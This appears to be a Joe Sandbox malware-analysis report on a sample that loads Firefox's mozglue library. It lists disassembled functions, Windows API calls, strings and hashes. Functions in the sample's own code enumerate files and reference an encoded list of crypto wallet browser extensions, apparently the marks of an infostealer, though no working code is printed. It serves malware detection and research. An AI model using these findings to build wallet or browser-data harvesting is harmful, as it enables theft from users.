getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C665796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6657B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6657CA

Strings

MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6654B9
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C665C56
MOZ_BASE_PROFILER_HELP, xrefs: 6C665511
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C665D24
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C665B38
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6654A3
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C665D1C
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C665749
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C665D2B
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6656E3
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C665717
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C665D01
GeckoMain, xrefs: 6C665554, 6C6655D5
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C665CF9
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C665BBE
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C665791
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C665AC9
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C66584E
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C665724
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6657AE
MOZ_PROFILER_STARTUP, xrefs: 6C6655E1
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C665766
[I %d/%d] profiler_init, xrefs: 6C66564E
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6657C5
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C66548D

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction ID: 177a8c64f2d46a8a752f75fa61e52c8de68fafea378d92d8cf6f77fefddd9d63
Opcode Fuzzy Hash: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction Fuzzy Hash: 2D2205709043419FDB009F76C89666ABBB5AF8734CF04462AE94A87F42EB31E445CB5F

Function 6C666C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C666CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C666D26

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C666D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C666D73
free.MOZGLUE(00000000), ref: 6C666D80
CertGetNameStringW.CRYPT32 ref: 6C666DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C666DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C666DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C666E10
CryptMsgClose.CRYPT32(00000000), ref: 6C666E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C666E34
CreateFileW.KERNEL32 ref: 6C666EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C666F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C66709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C667103
free.MOZGLUE(00000000), ref: 6C667153
CloseHandle.KERNEL32(?), ref: 6C667176
__Init_thread_footer.LIBCMT ref: 6C667209
__Init_thread_footer.LIBCMT ref: 6C66723A
__Init_thread_footer.LIBCMT ref: 6C66726B
__Init_thread_footer.LIBCMT ref: 6C66729C
__Init_thread_footer.LIBCMT ref: 6C6672DC
__Init_thread_footer.LIBCMT ref: 6C66730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6673C2
VerSetConditionMask.NTDLL ref: 6C6673F3
VerSetConditionMask.NTDLL ref: 6C6673FF
VerSetConditionMask.NTDLL ref: 6C667406
VerSetConditionMask.NTDLL ref: 6C66740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C66741A
moz_xmalloc.MOZGLUE(?), ref: 6C66755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C667568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C667585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C667598
free.MOZGLUE(00000000), ref: 6C6675AC

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

SHA256, xrefs: 6C666EC0
wintrust.dll, xrefs: 6C6672CD
CryptCATAdminReleaseCatalogContext, xrefs: 6C6672C8
(, xrefs: 6C66768A

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction ID: 66a7cec88e3af785e2294924bd49185265c2d8ef4da158a834f2fe8299d93b89
Opcode Fuzzy Hash: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction Fuzzy Hash: 9852E871A042149FEB21DF26CC84BAA77B8EF46704F144599E909A7A40DB70BF84CF5A

Function 6C690DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C690F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C690F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C690FB7
EnterCriticalSection.KERNEL32(?), ref: 6C690FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C691031
LeaveCriticalSection.KERNEL32(?), ref: 6C6910D0
EnterCriticalSection.KERNEL32(?), ref: 6C69117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C691C39
EnterCriticalSection.KERNEL32(6C6DE744), ref: 6C693391
LeaveCriticalSection.KERNEL32(6C6DE744), ref: 6C6933CD
LeaveCriticalSection.KERNEL32(?), ref: 6C693431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C693437

Strings

: (malloc) Unsupported character in malloc options: ', xrefs: 6C693A02
MALLOC_OPTIONS, xrefs: 6C6935FE
MOZ_CRASH(), xrefs: 6C693950
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C693559, 6C69382D, 6C693848
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6937D2
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6937BD
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C693793
Compile-time page size does not divide the runtime one., xrefs: 6C693946
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6937A8
<jemalloc>, xrefs: 6C693941, 6C6939F1

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 490fd3e4da68b349dcf174aeb13f7e1aa5eb04aedbdc4e08c90c6a630371fe5e
Instruction ID: 96dae9f6c816b0358c2a12f1448292288e71a0c622159dc55be4494e21494cd5
Opcode Fuzzy Hash: 490fd3e4da68b349dcf174aeb13f7e1aa5eb04aedbdc4e08c90c6a630371fe5e
Instruction Fuzzy Hash: 1F539E71A057028FD704CF29C580616FBE1BF8A328F29C76DE8699B791D771E842CB85

Function 6C6B34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EE2

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6B61DD
Part of subcall function 6C6B6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C6B622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4157

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6B6250
Part of subcall function 6C6B6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6B6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4896
free.MOZGLUE ref: 6C6B489F

Strings

, xrefs: 6C6B4CD2

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction ID: 58ee6da397fa28b9ce1d1355d0b4e0bc2cd33d329d9bb7f3149907bc63987aa2
Opcode Fuzzy Hash: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction Fuzzy Hash: 3CF26C74908B808FC725CF29C08469AFBF1FFCA304F118A5ED99997711DB71A896CB46

Function 6C6664C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6664DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6664F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C666505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C666518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C66671C
GetCurrentProcess.KERNEL32 ref: 6C666724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C66672F
GetCurrentProcess.KERNEL32 ref: 6C666759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C666764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C666A80
GetSystemInfo.KERNEL32(?), ref: 6C666ABE
__Init_thread_footer.LIBCMT ref: 6C666AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AF7

Strings

nvd3d9wrap.dll, xrefs: 6C666500
detoured.dll, xrefs: 6C6664DA
_etoured.dll, xrefs: 6C6664ED
user32.dll, xrefs: 6C666526
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C666798
nvdxgiwrap.dll, xrefs: 6C666513

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction ID: 7cc53657b461bba9e13a34008fa2f976f06660de6afbf4b2ef5565db851e3b8a
Opcode Fuzzy Hash: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction Fuzzy Hash: 5CF1E6709052199FDB20CF26DC887DAB7B5AF46318F144299D809E3B41D731EE85CF9A

Function 009338B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 009338CC
FindFirstFileA.KERNEL32(?,?), ref: 009338E3
lstrcat.KERNEL32(?,?), ref: 00933935
StrCmpCA.SHLWAPI(?,00940F70), ref: 00933947
StrCmpCA.SHLWAPI(?,00940F74), ref: 0093395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00933C67
FindClose.KERNEL32(000000FF), ref: 00933C7C

Strings

%s\%s, xrefs: 0093397A
%s\*, xrefs: 009338C0
%s\%s, xrefs: 00933A6F
%s\%s\%s, xrefs: 00933A4A
%s%s, xrefs: 00933AAD

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: d7ab7d0fe6b524fef9529dec560c95b023d2d5d1769b4a6e70b026ecc37d8276
Instruction ID: 2668918b4789cbd1045a465e0e54749fd994adb1a62bc797954c4b8a4219a7b7
Opcode Fuzzy Hash: d7ab7d0fe6b524fef9529dec560c95b023d2d5d1769b4a6e70b026ecc37d8276
Instruction Fuzzy Hash: F3A100B19402189BDB24DFA4DC85FEE7379BB98300F048598F64DA7181EB759B84CF62

Function 6C6BC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C6BC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BE432
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE472

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 07666fdb95abeea65de448be75d2845b17df2f4a7965e0ad538a7b64aa7667bc
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 5733AC71E0021A8FCB04CFA8C8806EDBBF2FF49314F288269D955BB755D731A956CB94

Function 6C67ED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C67EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C67EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C681695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6816B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C681770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C681A3E

Strings

~qel, xrefs: 6C67ED13
~qel, xrefs: 6C67ED10

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~qel$~qel
API String ID: 3693777188-2922831641
Opcode ID: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction ID: 8fa18b222c337912a8b1ca23478ce27298b3960ccb6cabc63e13a2ac82a5fafa
Opcode Fuzzy Hash: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction Fuzzy Hash: 13B33971E01219CFCB24CFA8C890ADDB7B2BF49304F2585A9D459AB745D730AD86CFA4

Function 00934570 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,wcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnB), ref: 00934580
RtlAllocateHeap.NTDLL(00000000), ref: 00934587
wsprintfA.USER32 ref: 009345A6
FindFirstFileA.KERNEL32(?,?), ref: 009345BD
StrCmpCA.SHLWAPI(?,00940FC4), ref: 009345EB
StrCmpCA.SHLWAPI(?,00940FC8), ref: 00934601
FindNextFileA.KERNEL32(000000FF,?), ref: 0093468B
FindClose.KERNEL32(000000FF), ref: 009346A0
lstrcat.KERNEL32(?,006FEA18), ref: 009346C5
lstrcat.KERNEL32(?,006FDCB0), ref: 009346D8
